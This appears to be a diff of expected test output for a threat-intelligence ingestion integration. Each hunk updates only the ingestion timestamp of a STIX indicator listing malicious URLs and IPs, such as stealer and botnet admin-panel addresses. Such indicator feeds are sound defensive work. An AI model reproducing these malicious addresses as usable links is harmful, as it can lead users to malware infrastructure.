@@ -9553,7 +9553,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023673200Z", + "ingested": "2021-12-14T14:57:43.118242396Z", "original": "{\"created\":\"2020-01-28T02:58:57.481Z\",\"description\":\"TS ID: 55263242026; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime\",\"id\":\"indicator--5a32ccb0-c749-4286-a606-f3bfe9a61084\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-01-28T02:58:57.481Z\",\"name\":\"mal_url: http://samaaj.org.pk/justices/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://samaaj.org.pk/justices/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:58:57.481Z\"}", "category": "threat", "type": "indicator", @@ -9605,7 +9605,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023676700Z", + "ingested": "2021-12-14T14:57:43.118242783Z", "original": "{\"created\":\"2020-01-28T02:59:19.105Z\",\"description\":\"TS ID: 55263242012; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--c26773dc-80be-48c8-98fd-409174bfd0e2\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-56\"],\"modified\":\"2020-01-28T02:59:19.105Z\",\"name\":\"mal_url: http://89.160.20.156/teejay/logs/omc.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/teejay/logs/omc.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:59:19.105Z\"}", "category": "threat", "type": "indicator", 
@@ -9650,7 +9650,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023682Z", + "ingested": "2021-12-14T14:57:43.118243179Z", "original": "{\"created\":\"2020-01-28T02:59:23.53Z\",\"description\":\"TS ID: 55263242004; iType: mal_ip; State: active; Org: Informacines sistemos ir technologijos, UAB; Source: CyberCrime\",\"id\":\"indicator--642f909c-b1e7-4b17-9786-c01371f5da67\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-59\"],\"modified\":\"2020-01-28T02:59:23.53Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:59:23.53Z\"}", "category": "threat", "type": "indicator", @@ -9701,7 +9701,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023688200Z", + "ingested": "2021-12-14T14:57:43.118243631Z", "original": "{\"created\":\"2020-01-28T02:59:26.887Z\",\"description\":\"TS ID: 55263242013; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--b50c1f06-f68e-4842-a1ac-cddef3c2ff05\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-28T02:59:26.887Z\",\"name\":\"mal_url: http://ld7cad07.justinstalledpanel.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ld7cad07.justinstalledpanel.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:59:26.887Z\"}", "category": "threat", "type": "indicator", 
@@ -9746,7 +9746,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023694400Z", + "ingested": "2021-12-14T14:57:43.118244076Z", "original": "{\"created\":\"2020-01-28T02:59:27.047Z\",\"description\":\"TS ID: 55263241837; iType: mal_ip; State: active; Org: IHNetworks, LLC; Source: CyberCrime\",\"id\":\"indicator--ab7dae9a-3218-40dd-984c-a928336e1ccb\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-38\"],\"modified\":\"2020-01-28T02:59:27.047Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:59:27.047Z\"}", "category": "threat", "type": "indicator", @@ -9798,7 +9798,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023701600Z", + "ingested": "2021-12-14T14:57:43.118244598Z", "original": "{\"created\":\"2020-01-28T02:59:34.735Z\",\"description\":\"TS ID: 55263242041; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime\",\"id\":\"indicator--fc149a8c-3d46-47f7-b0c2-9764d7291336\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-29\"],\"modified\":\"2020-01-28T02:59:34.735Z\",\"name\":\"mal_url: http://192.168.238.10/emmy/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://192.168.238.10/emmy/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:59:34.735Z\"}", "category": "threat", "type": "indicator", 
@@ -9850,7 +9850,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023708800Z", + "ingested": "2021-12-14T14:57:43.118245062Z", "original": "{\"created\":\"2020-01-28T02:59:34.772Z\",\"description\":\"TS ID: 55263241981; iType: mal_url; State: active; Org: Hostgator Asian Operations Division.; Source: CyberCrime\",\"id\":\"indicator--167c21ca-7d6b-455c-954a-91a5f036616d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-01-28T02:59:34.772Z\",\"name\":\"mal_url: http://aivazidis.gq/mad-ooo/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://aivazidis.gq/mad-ooo/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:59:34.772Z\"}", "category": "threat", "type": "indicator", @@ -9902,7 +9902,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023716Z", + "ingested": "2021-12-14T14:57:43.118245499Z", "original": "{\"created\":\"2020-01-28T02:59:39.12Z\",\"description\":\"TS ID: 55263241978; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime\",\"id\":\"indicator--8a35f477-32b2-4735-9e85-743115f1e83f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-01-28T02:59:39.12Z\",\"name\":\"mal_url: http://samaaj.org.pk/Elvis/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://samaaj.org.pk/Elvis/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:59:39.12Z\"}", "category": "threat", "type": "indicator", 
@@ -9953,7 +9953,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023723100Z", + "ingested": "2021-12-14T14:57:43.118245928Z", "original": "{\"created\":\"2020-01-28T02:59:54.142Z\",\"description\":\"TS ID: 55263242015; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--efcb1909-e772-4001-a96c-97c293baa98d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-01-28T02:59:54.142Z\",\"name\":\"mal_url: http://l3b57852.justinstalledpanel.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://l3b57852.justinstalledpanel.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:59:54.142Z\"}", "category": "threat", "type": "indicator", @@ -10005,7 +10005,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023729100Z", + "ingested": "2021-12-14T14:57:43.118246318Z", "original": "{\"created\":\"2020-01-28T02:59:54.166Z\",\"description\":\"TS ID: 55263241966; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime\",\"id\":\"indicator--b5c97605-a434-4b73-a655-acc88db57cb7\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-01-28T02:59:54.166Z\",\"name\":\"mal_url: http://samaaj.org.pk/fk/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://samaaj.org.pk/fk/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:59:54.166Z\"}", "category": "threat", "type": "indicator", 
@@ -10057,7 +10057,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023735200Z", + "ingested": "2021-12-14T14:57:43.118246749Z", "original": "{\"created\":\"2020-01-28T02:59:54.193Z\",\"description\":\"TS ID: 55263241841; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--10690da4-ed16-4fac-bae7-25a1b17db17d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-55\"],\"modified\":\"2020-01-28T02:59:54.193Z\",\"name\":\"mal_url: http://89.160.20.156/34DEF67D-347D-4799-A12D-84D8482E3B54/azorult/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/34DEF67D-347D-4799-A12D-84D8482E3B54/azorult/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:59:54.193Z\"}", "category": "threat", "type": "indicator", @@ -10102,7 +10102,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023742500Z", + "ingested": "2021-12-14T14:57:43.118247232Z", "original": "{\"created\":\"2020-01-28T02:59:54.253Z\",\"description\":\"TS ID: 55263241840; iType: mal_ip; State: active; Org: Uaservers Network; Source: CyberCrime\",\"id\":\"indicator--dff78d62-6939-4d47-a5b3-0c275a472f7f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-01-28T02:59:54.253Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:59:54.253Z\"}", "category": "threat", "type": "indicator", 
@@ -10154,7 +10154,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023749500Z", + "ingested": "2021-12-14T14:57:43.118247731Z", "original": "{\"created\":\"2020-01-28T03:00:08.397Z\",\"description\":\"TS ID: 55263242037; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime\",\"id\":\"indicator--c1f7d2e7-4186-47c6-a29b-cdb9bb524732\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-68\"],\"modified\":\"2020-01-28T03:00:08.397Z\",\"name\":\"mal_url: http://j1034033.myjino.ru/laskovo/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://j1034033.myjino.ru/laskovo/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T03:00:08.397Z\"}", "category": "threat", "type": "indicator", @@ -10206,7 +10206,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023756700Z", + "ingested": "2021-12-14T14:57:43.118248233Z", "original": "{\"created\":\"2020-01-28T03:00:08.446Z\",\"description\":\"TS ID: 55263241846; iType: mal_url; State: active; Org: UAB Cherry Servers; Source: CyberCrime\",\"id\":\"indicator--2ffd18da-452a-462b-a264-4c457564de62\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-61\"],\"modified\":\"2020-01-28T03:00:08.446Z\",\"name\":\"mal_url: http://89.160.20.156/xcool!/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/xcool!/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T03:00:08.446Z\"}", "category": "threat", "type": "indicator", 
@@ -10258,7 +10258,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023763900Z", + "ingested": "2021-12-14T14:57:43.118248666Z", "original": "{\"created\":\"2020-01-28T03:00:22.832Z\",\"description\":\"TS ID: 55263242001; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime\",\"id\":\"indicator--bdb1bbc0-4cfe-484b-8c99-22ff164e345d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-01-28T03:00:22.832Z\",\"name\":\"mal_url: http://samaaj.org.pk/ejima/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://samaaj.org.pk/ejima/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T03:00:22.832Z\"}", "category": "threat", "type": "indicator", @@ -10310,7 +10310,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023771200Z", + "ingested": "2021-12-14T14:57:43.118249118Z", "original": "{\"created\":\"2020-01-28T03:00:23.929Z\",\"description\":\"TS ID: 55263241843; iType: mal_url; State: active; Org: Saginaw Valley State University; Source: CyberCrime\",\"id\":\"indicator--b708bbd4-d0f4-406e-926e-086fd1bd096e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-75\"],\"modified\":\"2020-01-28T03:00:23.929Z\",\"name\":\"mal_url: http://155.138.222.174/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://155.138.222.174/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T03:00:23.929Z\"}", "category": "threat", "type": "indicator", 
@@ -10362,7 +10362,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023775300Z", + "ingested": "2021-12-14T14:57:43.118249510Z", "original": "{\"created\":\"2020-01-28T03:00:30.838Z\",\"description\":\"TS ID: 55263241974; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime\",\"id\":\"indicator--384ff3f4-d643-4b23-ad90-9b4fa7524db8\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-01-28T03:00:30.838Z\",\"name\":\"mal_url: http://samaaj.org.pk/emp/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://samaaj.org.pk/emp/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T03:00:30.838Z\"}", "category": "threat", "type": "indicator", @@ -10413,7 +10413,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023780600Z", + "ingested": "2021-12-14T14:57:43.118249996Z", "original": "{\"created\":\"2020-01-28T03:00:52.335Z\",\"description\":\"TS ID: 55263242016; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--b5e5a709-1001-4905-9019-d69e53b8393d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-01-28T03:00:52.335Z\",\"name\":\"mal_url: http://minecraft-only.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://minecraft-only.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T03:00:52.335Z\"}", "category": "threat", "type": "indicator", 
@@ -10465,7 +10465,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023786200Z", + "ingested": "2021-12-14T14:57:43.118250487Z", "original": "{\"created\":\"2020-01-28T03:01:04.475Z\",\"description\":\"TS ID: 55263242040; iType: mal_url; State: active; Org: Uaservers Network; Source: CyberCrime\",\"id\":\"indicator--910b12d0-b553-4219-846e-824ea3be86f8\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-01-28T03:01:04.475Z\",\"name\":\"mal_url: http://buythebest.pw/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://buythebest.pw/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T03:01:04.475Z\"}", "category": "threat", "type": "indicator", @@ -10517,7 +10517,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023790500Z", + "ingested": "2021-12-14T14:57:43.118250930Z", "original": "{\"created\":\"2020-01-28T03:01:04.538Z\",\"description\":\"TS ID: 55263242010; iType: mal_url; State: active; Org: LeaseWeb Netherlands B.V.; Source: CyberCrime\",\"id\":\"indicator--6e7ba339-ede0-47fd-a6c9-bd1ffb61fbbf\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-01-28T03:01:04.538Z\",\"name\":\"mal_url: http://smtress.zzz.com.ua/admin/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://smtress.zzz.com.ua/admin/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T03:01:04.538Z\"}", "category": "threat", "type": "indicator", 
@@ -10569,7 +10569,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023794500Z", + "ingested": "2021-12-14T14:57:43.118251309Z", "original": "{\"created\":\"2020-01-28T03:01:31.533Z\",\"description\":\"TS ID: 55263241845; iType: mal_url; State: active; Org: Choopa, LLC; Source: CyberCrime\",\"id\":\"indicator--1d0c2a7c-ba78-4e9f-ae7a-4ce2988357b1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-24\"],\"modified\":\"2020-01-28T03:01:31.533Z\",\"name\":\"mal_url: http://149.28.199.128/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://149.28.199.128/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T03:01:31.533Z\"}", "category": "threat", "type": "indicator", @@ -10621,7 +10621,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023799700Z", + "ingested": "2021-12-14T14:57:43.118251762Z", "original": "{\"created\":\"2020-01-29T02:59:29.937Z\",\"description\":\"TS ID: 55266539002; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--b78ae5fd-ee1e-49ab-9519-fb62ba1bb26a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-74\"],\"modified\":\"2020-01-29T02:59:29.937Z\",\"name\":\"mal_url: http://ecoorganic.co/Work6/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ecoorganic.co/Work6/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T02:59:29.937Z\"}", "category": "threat", "type": "indicator", 
@@ -10673,7 +10673,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023805Z", + "ingested": "2021-12-14T14:57:43.118252152Z", "original": "{\"created\":\"2020-01-29T03:00:21.905Z\",\"description\":\"TS ID: 55266539006; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--ec4322a7-481b-4787-8df2-e3b3bc0c8b8b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-74\"],\"modified\":\"2020-01-29T03:00:21.905Z\",\"name\":\"mal_url: http://ecoorganic.co/Work2/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ecoorganic.co/Work2/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:00:21.905Z\"}", "category": "threat", "type": "indicator", @@ -10725,7 +10725,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023809300Z", + "ingested": "2021-12-14T14:57:43.118252539Z", "original": "{\"created\":\"2020-01-29T03:00:29.782Z\",\"description\":\"TS ID: 55266539008; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--cc172be8-7e67-489c-8bd8-8e9ffc11a944\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-01-29T03:00:29.782Z\",\"name\":\"mal_url: http://aikchimhin.com/walterXXXX/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://aikchimhin.com/walterXXXX/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:00:29.782Z\"}", "category": "threat", "type": "indicator", 
@@ -10776,7 +10776,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023813800Z", + "ingested": "2021-12-14T14:57:43.118253030Z", "original": "{\"created\":\"2020-01-29T03:00:38.132Z\",\"description\":\"TS ID: 55266538988; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--6cb1c4c4-93cb-4ad9-b176-e2a47febafac\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-93\"],\"modified\":\"2020-01-29T03:00:38.132Z\",\"name\":\"mal_url: http://ssgcvb3435fsdgdfg5656sdfgsdfsdf.xyz/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ssgcvb3435fsdgdfg5656sdfgsdfsdf.xyz/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:00:38.132Z\"}", "category": "threat", "type": "indicator", @@ -10828,7 +10828,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023817400Z", + "ingested": "2021-12-14T14:57:43.118253465Z", "original": "{\"created\":\"2020-01-29T03:00:38.721Z\",\"description\":\"TS ID: 55266538999; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--42f95e09-bad2-4055-bf72-fd3d1f26a173\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-74\"],\"modified\":\"2020-01-29T03:00:38.721Z\",\"name\":\"mal_url: http://ecoorganic.co/Work8/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ecoorganic.co/Work8/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:00:38.721Z\"}", "category": "threat", "type": "indicator", 
@@ -10880,7 +10880,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023822500Z", + "ingested": "2021-12-14T14:57:43.118253860Z", "original": "{\"created\":\"2020-01-29T03:00:51.527Z\",\"description\":\"TS ID: 55266539012; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--b9eafbc4-77e3-4b9b-bd34-a15681f0bbec\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-01-29T03:00:51.527Z\",\"name\":\"mal_url: http://corpcougar.com/me/32/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://corpcougar.com/me/32/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:00:51.527Z\"}", "category": "threat", "type": "indicator", @@ -10932,7 +10932,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023829900Z", + "ingested": "2021-12-14T14:57:43.118254249Z", "original": "{\"created\":\"2020-01-29T03:01:05.442Z\",\"description\":\"TS ID: 55266539004; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--9a6acfec-ffa7-47c7-8176-7dbaca7b379f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-74\"],\"modified\":\"2020-01-29T03:01:05.442Z\",\"name\":\"mal_url: http://ecoorganic.co/Work4/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ecoorganic.co/Work4/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:01:05.442Z\"}", "category": "threat", "type": "indicator", 
@@ -10977,7 +10977,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023834600Z", + "ingested": "2021-12-14T14:57:43.118254792Z", "original": "{\"created\":\"2020-01-29T03:01:13.933Z\",\"description\":\"TS ID: 55266539014; iType: mal_ip; State: active; Org: Lir.bg EOOD; Source: CyberCrime\",\"id\":\"indicator--5384d504-8760-4255-8daa-dd156dc302d0\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-24\"],\"modified\":\"2020-01-29T03:01:13.933Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:01:13.933Z\"}", "category": "threat", "type": "indicator", @@ -11029,7 +11029,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023840600Z", + "ingested": "2021-12-14T14:57:43.118255232Z", "original": "{\"created\":\"2020-01-29T03:01:31.192Z\",\"description\":\"TS ID: 55266539003; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--56b347c9-58c9-48d5-a015-2d561d855af2\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-74\"],\"modified\":\"2020-01-29T03:01:31.192Z\",\"name\":\"mal_url: http://ecoorganic.co/Work5/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ecoorganic.co/Work5/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:01:31.192Z\"}", "category": "threat", "type": "indicator", 
@@ -11081,7 +11081,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023846500Z", + "ingested": "2021-12-14T14:57:43.118255667Z", "original": "{\"created\":\"2020-01-29T03:01:37.815Z\",\"description\":\"TS ID: 55266538992; iType: mal_url; State: active; Org: Exa Bytes Network Sdn.Bhd.; Source: CyberCrime\",\"id\":\"indicator--840739fb-44ae-42f0-805f-422b38422325\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-76\"],\"modified\":\"2020-01-29T03:01:37.815Z\",\"name\":\"mal_url: http://rajas.com.my/wp-content/uploads/2015/nux/Panel/lucifer/Panel/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://rajas.com.my/wp-content/uploads/2015/nux/Panel/lucifer/Panel/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:01:37.815Z\"}", "category": "threat", "type": "indicator", @@ -11133,7 +11133,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023852100Z", + "ingested": "2021-12-14T14:57:43.118256155Z", "original": "{\"created\":\"2020-01-29T03:01:49.96Z\",\"description\":\"TS ID: 55266539011; iType: mal_url; State: active; Org: Domain names registrar REG.RU, Ltd; Source: CyberCrime\",\"id\":\"indicator--9ab8a69c-5b95-4fd6-b189-11d90ee54834\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-01-29T03:01:49.96Z\",\"name\":\"mal_url: http://rgmechanics.fun/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://rgmechanics.fun/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:01:49.96Z\"}", "category": "threat", "type": "indicator", 
